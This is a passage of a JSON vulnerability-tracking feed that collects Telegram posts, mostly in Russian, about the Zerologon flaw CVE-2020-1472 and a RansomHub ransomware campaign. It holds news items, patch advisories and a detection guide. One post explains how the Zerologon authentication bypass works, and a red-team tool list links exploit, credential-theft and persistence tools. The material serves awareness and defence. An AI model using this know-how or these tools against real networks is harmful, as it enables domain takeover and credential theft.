\u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u0430 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b, \u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0442\u044c \u0442\u0435\u043d\u0435\u0432\u044b\u0435 \u043a\u043e\u043f\u0438\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0437\u0430\u0447\u0438\u0449\u0430\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u044f \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 .\n\n\u041e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u0437\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a RansomHub \u0441\u0442\u0430\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f, \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043d\u043d\u0430\u044f \u0432\u0441\u0435\u0433\u043e \u0437\u0430 14 \u0447\u0430\u0441\u043e\u0432. 
\u041f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u043c \u044d\u043a\u0440\u0430\u043d\u0435 Palo Alto ( CVE-2024-3400 ) \u0434\u043b\u044f \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0442 VPN-\u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0442\u0430\u0440\u044b\u0435 \u0431\u0440\u0435\u0448\u0438 \u0432 Windows ( CVE-2021-42278 \u0438 CVE-2020-1472 ), \u043f\u043e\u043b\u0443\u0447\u0430\u044f \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0435\u0442\u044c\u044e.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0441\u0442\u043e\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439 \u0438\u0437-\u0437\u0430 \u043d\u0435\u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. 
\u0415\u0441\u043b\u0438 \u0442\u0430 \u0438\u043b\u0438 \u0438\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0437\u0430\u043a\u0440\u044b\u0442\u0443\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434, \u0442\u043e \u0432\u0438\u043d\u043e\u0432\u0430\u0442\u043e \u0432 \u044d\u0442\u043e\u043c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0435\u0451 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0445\u0430\u043b\u0430\u0442\u043d\u043e\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0435 \u043a \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0433\u043b\u0443\u043f\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0442\u044c \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043d\u0430 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.\n\n\u0420\u0430\u0441\u0442\u0443\u0449\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437. 
\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0443\u0441\u0438\u043b\u0438\u0432\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0437\u0430\u0449\u0438\u0442\u0443, \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0438 \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0436\u0435\u0440\u0442\u0432 RansomHub \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-02-17T08:21:47.000000Z"}, {"uuid": "0407863b-dcea-40af-8a89-1e62fdfba3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/SumV8avL7Sbl1SJPE_rB4-ULAsTbHoJ55H_PswnJfdlCjxM", "content": "", "creation_timestamp": "2025-10-05T03:00:06.000000Z"}, {"uuid": "c776bb1e-9a27-44d8-9953-2355f6be37e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/3525", "content": "\u200b\u200b\u0421\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0442\u0435\u043c\u044b \u0437\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0443\u044e 
\u043d\u0435\u0434\u0435\u043b\u044e\n\n\u2714\ufe0f Soft - Cscan\n\u2714\ufe0f Keychain \u0432 iOS - \u0447\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438?\n\u2714\ufe0f \u0413\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0431\u043e\u043b\u044c\u0448\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u044b\u0445 \u0447\u0438\u0441\u0435\u043b Python\n\u2714\ufe0f SYSENTER \u2013 \u0441\u043a\u0440\u044b\u0442\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a Native-API\n\u2714\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Recon\n\u2714\ufe0f \u041e\u0431\u0437\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u201cZeroLogon\u201d\n\u2714\ufe0f \u041a\u0430\u043a \u0437\u0430\u0431\u0430\u043d\u0438\u0442\u044c IP \u0430\u0434\u0440\u0435\u0441?\n\u2714\ufe0f \u0412\u0430\u043a\u0430\u043d\u0441\u0438\u044f - \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u043f\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044e \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Advanced Threat Protection\n\u2714\ufe0f \u0412\u0437\u043b\u043e\u043c\u0430\u0442\u044c \u0432\u043a\n\u2714\ufe0f \u041d\u0430 \u043a\u0430\u043a\u043e\u043c \u044f\u043f \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0412\u041a\u043e\u043d\u0442\u0430\u043a\u0442\u0435?\n\u2714\ufe0f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435", "creation_timestamp": "2020-10-14T10:10:43.000000Z"}, {"uuid": "6f52a952-552e-485d-8d6a-12c68c2fd812", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": 
"https://t.me/codeby_sec/4535", "content": "\u200b\u200b\u041e\u0431\u0437\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u201cZeroLogon\u201d\n\n\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442! \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2020 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0435\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-1472. \u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430.\n\u041f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u044e \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0443\u0433\u043b\u0443\u0431\u0438\u0442\u044c\u0441\u044f \u0432 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443, \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0432 \u043f\u0440\u0438\u0447\u0438\u043d\u0430\u0445 \u0438 \u0440\u0438\u0441\u043a\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u0438 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b.\n\n\u0427\u0438\u0442\u0430\u0442\u044c: https://codeby.net/threads/obzor-ujazvimosti-cve-2020-1472-i-ehksploita-zerologon.75277/\n\n#exploit #windows", "creation_timestamp": "2021-06-01T17:17:00.000000Z"}, {"uuid": "bdcce02f-9ea6-45c5-a132-49eb0126ef69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/x_notes/202", "content": "\ud83d\udfe2\ud83d\udfe2\n\ud83d\udcf0 \u041d\u0430 #github \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0441\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 #Zerologon (CVE-2020-1472). \u041e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0437\u0430\u0432\u0435\u0440\u0448\u0430\u0435\u0442 \u0441\u0435\u0441\u0441\u0438\u044e.\n\ud83d\udd25 \u0415\u0441\u043b\u0438 \u043a\u0442\u043e-\u0442\u043e \u043d\u0435 \u0432 \u043a\u0443\u0440\u0441\u0435 \u0434\u0435\u043b\u0430, \u0442\u043e #Microsoft \u0437\u0430\u043f\u0430\u0442\u0447\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u043f\u0443\u0442\u0451\u043c \u0432\u044b\u0437\u043e\u0432\u0430 #RPC \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0430, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e. \n\u2764\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 10 \u0431\u0430\u043b\u043e\u0432 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 #CVSS. 
\u0422\u0430\u043a \u0447\u0442\u043e \u0435\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u043d\u0430\u043a\u0430\u0442\u0438\u043b\u0438 \u0430\u043f\u0434\u0435\u0439\u0442\u044b, \u0442\u043e \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u0440\u0430. \u041d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u044d\u0442\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0443\u043c\u0435\u043b\u044c\u0446\u044b \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u043f\u0438\u0448\u0443\u0442 \u0431\u043e\u0435\u0432\u043e\u0439 \u0441\u043f\u043b\u043e\u0439\u0442, \u0430 \u043f\u043e\u0442\u043e\u043c \u0431\u0443\u0434\u0435\u0442 \u0431\u0435\u0434\u0430.\n\n#vulnerability #ActiveDirectory #patchtuesday \n\nhttps://github.com/SecuraBV/CVE-2020-1472", "creation_timestamp": "2020-09-22T18:42:29.000000Z"}, {"uuid": "7e85bac3-7a4a-4b60-a983-af8d31b12902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/codeby_sec/8087", "content": "\u200b\u200b\u041e\u0431\u0437\u043e\u0440 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-1472 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430 \u201cZeroLogon\u201d\n\n\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442! \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2020 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0435\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-1472. 
This vulnerability makes it possible to take over a domain controller.\nI suggest digging a little deeper into this topic, understanding the causes and risks associated with this vulnerability, and looking at the existing exploits.\n\n\ud83d\udccc Read more\n\n#exploit #windows", "creation_timestamp": "2024-04-11T17:39:27.000000Z"}, {"uuid": "e2de459b-2939-4304-8f69-9fa63e68f10c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/0kkoPZe9SRaFjk6r6hE0E-PGR1LEPuhACBCZgoO035MqCFM", "content": "", "creation_timestamp": "2025-10-05T03:00:12.000000Z"}, {"uuid": "5765c879-0f40-461e-9da8-266b01b71d7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/antichat/8859", "content": "We wrote a guide on detecting 
exploitation of one of the most dangerous vulnerabilities of recent years: CVE-2020-1472, or Zerologon.\n\nIt allows an attacker to take over a domain controller without even having any user account. 
To exploit the vulnerability, the attacker only needs to connect to the corporate network.\n\nDuring our research we developed several methods for detecting Zerologon exploitation:\n\u25aa\ufe0f from Windows audit log events;\n\u25aa\ufe0f from network traffic;\n\u25aa\ufe0f using YARA rules.\n\nThese methods can be used either separately or together, which makes it possible not only to detect exploitation 
of the vulnerability but also to speed up incident classification.\n\nRead more about each of the detection methods in our article.", "creation_timestamp": "2020-11-03T14:00:37.000000Z"}, {"uuid": "8962a31b-fc25-42f0-9aa3-f83887c6b75a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2079", "content": "CVE-2020-1472: Zerologon\nhttps://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472", "creation_timestamp": "2020-09-14T17:07:13.000000Z"}, {"uuid": "0fcfba71-bd53-48d0-9f19-53f3dc67409c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/tech_b0lt_Genona/2078", "content": "A big stir arose in the infosec community after the Dutch infosec 
company Secure BV today published technical details of CVE-2020-1472, a vulnerability fixed by Microsoft in the August update and named Zerologon.  \n\nAlthough it was already known that the bug scored 10 out of 10 on the severity scale and concerns privilege escalation in Netlogon, the authentication service in Windows Server, complete information was not available. 
It appeared today and got everyone worked up.\n\nThe vulnerability is a flaw in the cryptographic authentication of the Netlogon Remote Protocol. It allows an attacker to impersonate any host on the network, including the domain controller itself. In addition, the hacker can disable Netlogon authentication security features and change the password in Active Directory. \n\nSo where exactly was the bug? 
In the implementation of the AES-CFB8 encryption algorithm in the ComputeNetlogonCredential function, where the initialization vector (IV) is fixed and consists of 16 zero bytes, although security requirements say it must be random. As a result, for 1 in 256 keys, applying the encryption to an all-zero input yields an equally all-zero output.\n\nWhy is that bad? 
Because a hacker, by trying several times in a row (the average expected number of attempts is 256), can bypass the authentication process, since one of its key parameters, ClientCredential, is computed precisely with ComputeNetlogonCredential. 
That is, on average in 1 out of 256 attempts the server, on receiving a client request of 8 zeros, will expect a ClientCredential that is also 8 zeros.\n\nAnd since the account of the connecting computer is not locked out after a wrong answer, with a simple sequence of attempts to feed the server 8 zeros, which takes about 3 seconds, the attacker will pass the authentication process. 
\n\nAfter that the hacker will use a few more tricks related to the ComputeNetlogonCredential vulnerability to take full control of the domain controller.\n\nThe only limitation on the attack is that the attacker must carry it out from inside the network, having first compromised one of the machines. 
But in many cases that is a solvable task.\n\nThe patch released by Microsoft in August fixes the Zerologon vulnerability by making it mandatory to enable the NRPC transport encryption mechanism, which the hacker could bypass simply by disabling it on the client side (this was allowed). \n\nInfosec experts consider Zerologon a vulnerability that is quite easy to exploit and very dangerous - \"This is really scary\". 
To keep it from being \"scary\", you just need to update your Windows Servers in a timely manner.", "creation_timestamp": "2020-09-14T17:05:34.000000Z"}, {"uuid": "2007ba37-76d5-47de-9cba-96fd6b2d4311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/2085", "content": "> The developers of the Samba project warned users that the ZeroLogin vulnerability (CVE-2020-1472) recently identified in Windows also affects the Samba-based domain controller implementation. 
The vulnerability is caused by flaws in the MS-NRPC protocol and the AES-CFB8 cryptographic algorithm, and when successfully exploited allows an attacker to gain administrator access on the domain controller.\n\nhttps://www.opennet.ru/opennews/art.shtml?num=53728", "creation_timestamp": "2020-09-17T09:16:10.000000Z"}, {"uuid": "1ff9cd0e-5bcf-448b-aad8-94a6a02a9c7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/CyberGovIL/822", "content": "Microsoft's monthly security update - August 2020 | LEA102064\n\nOn the 11th of the month, Microsoft published about 120 security updates for vulnerabilities in supported software. 
17 vulnerabilities are classified as critical.\n\nThe most severe vulnerabilities could allow attackers to execute code remotely (RCE).\n\n2 vulnerabilities are being actively exploited in attacks worldwide (Zero day).\n\nPlease note the vulnerability in the NetLogon service (CVE-2020-1472) and its remediation, which consists of several steps.\n\nIt is strongly recommended to test the updates in a test environment and to install them as soon as possible.", "creation_timestamp": "2020-08-12T13:06:42.000000Z"}, {"uuid": "7e3bc70a-c31c-44b4-81af-5d0738454d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/2089", "content": "address of these users so that you can target their box.  
Link: https://github.com/HunnicCyber/SharpSniper      SharpSphere:    Description: SharpSphere gives red teamers the ability to easily interact with the guest operating systems of virtual machines managed by vCenter  Link: https://github.com/JamesCooteUK/SharpSphere      SharpSpray:    Description: SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.  Link: https://github.com/jnqpblc/SharpSpray      SharpSQLPwn:    Description: C# tool to identify and exploit weaknesses with MSSQL instances in Active Directory environments  Link: https://github.com/lefayjey/SharpSQLPwn      SharpStay:    Description: .NET Persistence  Link: https://github.com/0xthirteen/SharpStay      SharpSvc:    Description: SharpSvc is a simple code set to interact with the SC Manager API using the same DCERPC process as sc.exe, which open with TCP port 135 and is followed by the use of an ephemeral TCP   port  Link: https://github.com/jnqpblc/SharpSvc      SharpTask:    Description: SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCERPC process as schtasks.exe, which open with TCP port 135 and is followed by the use of   an ephemeral TCP port.  
Link: https://github.com/jnqpblc/SharpTask      SharpUp:    Description: SharpUp is a C# port of various PowerUp functionality  Link: https://github.com/GhostPack/SharpUp      SharpView:    Description: .NET port of PowerView  Link: https://github.com/tevora-threat/SharpView      SharpWebServer:    Description: Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes  Link: https://github.com/mgeeky/SharpWebServer      SharpWifiGrabber:    Description: Retrieves in clear-text the Wi-Fi Passwords from all WLAN Profiles saved on a workstation  Link: https://github.com/r3nhat/SharpWifiGrabber      SharpWMI:    Description: SharpWMI is a C# implementation of various WMI functionality.  Link: https://github.com/GhostPack/SharpWMI      SharpZeroLogon:    Description: An exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass.  Link: https://github.com/nccgroup/nccfsas      Shhmon:    Description: While Sysmon's driver can be renamed at installation, it is always loaded at altitude 385201. The objective of this tool is to challenge the assumption that our defensive tools are   always collecting events.  Link: https://github.com/matterpreter/Shhmon      Snaffler:    Description: Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD   environment).  Link: https://github.com/SnaffCon/Snaffler      SqlClient:    Description: C# .NET mssql client for accessing database data through beacon.  
Link: https://github.com/FortyNorthSecurity/SqlClient      StandIn:    Description: StandIn is a small AD post-compromise toolkit  Link: https://github.com/FuzzySecurity/StandIn      SweetPotato:    Description: A collection of various native Windows privilege escalation techniques from service accounts to SYSTEM  Link: https://github.com/CCob/SweetPotato      ThreatCheck:    Description: Modified version of Matterpreter's DefenderCheck  Link: https://github.com/rasta-mouse/ThreatCheck      TokenStomp:    Description: C# POC for the token privilege removal flaw reported  Link: https://github.com/MartinIngesen/TokenStomp      TruffleSnout:    Description: Iterative AD discovery toolkit for offensive operators  Link: https://github.com/dsnezhkov/TruffleSnout      Watson:    Description: Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.  Link: https://github.com/rasta-mouse/Watson      Whisker:    Description: Whisker is a C#", "creation_timestamp": "2023-02-17T13:46:41.000000Z"}, {"uuid": "d5e7032c-99de-42bc-b3fa-0f3ade920814", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/BleepingComputer/8221", "content": "Microsoft clarifies patch confusion for Windows Zerologon flaw\n\nMicrosoft clarified the steps customers should take to make sure that their devices are protected against ongoing attacks using Windows Server Zerologon\u00a0(CVE-2020-1472) exploits. 
[...]\n\nhttps://www.bleepingcomputer.com/news/security/microsoft-clarifies-patch-confusion-for-windows-zerologon-flaw/", "creation_timestamp": "2020-09-29T15:09:03.000000Z"}, {"uuid": "c4fee9f7-fd8a-4c39-b501-270f1ede16a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/BleepingComputer/8146", "content": "Windows Zerologon PoC exploits allow domain takeover. Patch Now!\n\nResearchers have released exploits for the Windows Zerologon CVE-2020-1472 vulnerability that allow an attacker to take control of a Windows domain. Install patches now! [...]\n\nhttps://www.bleepingcomputer.com/news/microsoft/windows-zerologon-poc-exploits-allow-domain-takeover-patch-now/", "creation_timestamp": "2020-09-15T20:38:13.000000Z"}, {"uuid": "a38eeaa5-c461-433d-a1c5-3fe0488a2e44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 